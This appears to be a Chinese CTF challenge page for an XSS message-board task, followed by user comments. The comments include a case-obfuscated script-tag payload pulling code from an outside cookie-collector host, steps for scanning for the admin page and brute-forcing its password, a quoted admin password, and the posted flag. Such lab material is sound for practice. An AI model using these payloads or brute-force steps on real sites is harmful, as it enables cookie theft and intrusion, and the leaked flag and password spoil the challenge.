留言板WEB 未解决
分数:
10
金币:
3
题目作者:
harry
一 血:
꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励:
5金币
解 决:
2299
提 示:
题目无需登录后台!需要xss平台接收flag
描 述:
http协议需要http协议的xss平台
评论
1hon 1月前
举报
找个xss平台,注入xss获取cookie
Goodboy 2月前
举报
按作者的思路不会做,搜了一下有教的也不具体。用老方法好了
18956160518 2月前
举报
难,参考https://blog.csdn.net/m0_57954651/article/details/127621060,不知道怎么得到密码的,就复制了,结果也出来了
dzss 2月前
举报
db.sql怎么链接不上
dzss 2月前
举报
这个密码怎么得出来的 admin 011be4d65feac1a8
lwq522725 3月前
举报
sCRiPt/SrC=//i0.al/Logugk>
qixi 3月前
举报
直接放入xss平台地址留言就行了
Jaylon 2月前
举报
来个xss平台
popoh 4月前
举报
db.sql压根就没有
songci 4月前
举报
flag{750d33e925f6dbf1784a1a924c237534}
19881191586 4月前
举报
第一步:用御剑或dirsearch扫描后台,发现index.php和admin.php 第二步:用工具爆破admin的登录密码 第三步:进入admin页面,刷新页面,弹出提示,提示里面出现URL编码后的flag 第四步:URL解码